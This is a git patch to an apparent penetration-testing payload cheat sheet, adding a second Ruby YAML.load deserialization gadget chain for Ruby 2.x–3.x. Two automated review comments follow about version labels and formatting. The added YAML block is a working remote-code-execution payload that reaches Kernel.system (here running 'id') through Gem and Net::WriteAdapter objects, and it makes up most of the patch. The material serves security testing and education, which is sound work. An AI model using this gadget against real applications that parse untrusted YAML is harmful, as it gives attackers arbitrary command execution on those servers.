From eb933317d0d641dc5917ccecffd8cf63aca98732 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mi=C5=82osz=20Skaza?= Date: Wed, 1 Jun 2022 09:55:48 +0100 Subject: [PATCH] Add new ruby yaml gadget chain --- Insecure Deserialization/Ruby.md | 29 +++++++++++++++++++++++++++-- 1 file changed, 27 insertions(+), 2 deletions(-) diff --git a/Insecure Deserialization/Ruby.md b/Insecure Deserialization/Ruby.md index 6263526..79c91e7 100644 --- a/Insecure Deserialization/Ruby.md +++ b/Insecure Deserialization/Ruby.md @@ -16,7 +16,7 @@ require "yaml" YAML.load(File.read("p.yml")) ``` -Exploitation code +Universal gadget for ruby <= 2.7.2: ```ruby --- !ruby/object:Gem::Requirement requirements: 
@@ -29,9 +29,34 @@ requirements: spec: ``` +Universal gadget for ruby 2.x - 3.x. + +```ruby +--- +- !ruby/object:Gem::Installer + i: x +- !ruby/object:Gem::SpecFetcher + i: y +- !ruby/object:Gem::Requirement + requirements: + !ruby/object:Gem::Package::TarReader + io: &1 !ruby/object:Net::BufferedIO + io: &1 !ruby/object:Gem::Package::TarReader::Entry + read: 0 + header: "abc" + debug_output: &1 !ruby/object:Net::WriteAdapter + socket: &1 !ruby/object:Gem::RequestSet + sets: !ruby/object:Net::WriteAdapter + socket: !ruby/module 'Kernel' + method_id: :system + git_set: id + method_id: :resolve +``` + ## References - [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/) - [Universal RCE with Ruby YAML.load - @_staaldraad ](https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/) -- [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online) \ No newline at end of file +- [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online) +- [Universal RCE with Ruby YAML.load (versions > 2.7) - @_staaldraad](https://staaldraad.github.io/post/2021-01-09-universal-rce-ruby-yaml-load-updated/) \ No newline at end of file
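Review bot: the version labels introduced by the two hunks overlap: the first hunk renames the existing block to "Universal gadget for ruby <= 2.7.2:" while the second hunk labels the new block "Universal gadget for ruby 2.x - 3.x.", so a reader cannot tell which chain is meant for 2.7.2 and earlier and which for later releases. Suggest making the ranges disjoint and consistent with the reference added at the end of the file ("versions > 2.7"), e.g. `Universal gadget for Ruby <= 2.7.2:` and `Universal gadget for Ruby > 2.7.2 (2.7.x / 3.x):`, and using the same trailing colon on both headings.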
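Review bot: the new block in the second hunk is YAML (the contents of the `p.yml` that `YAML.load(File.read("p.yml"))` parses), but its fence is tagged ```ruby like the existing block above it; tagging both fences ```yaml gives correct highlighting and makes the file/format relationship explicit. Two smaller documentation points in the same hunk: the file still ends without a trailing newline (`\ No newline at end of file` on the new last reference line), so add one to avoid the same diff noise on the next edit, and the new paragraph does not state which interpreter versions the chain was actually tested against, which the README should record next to the label.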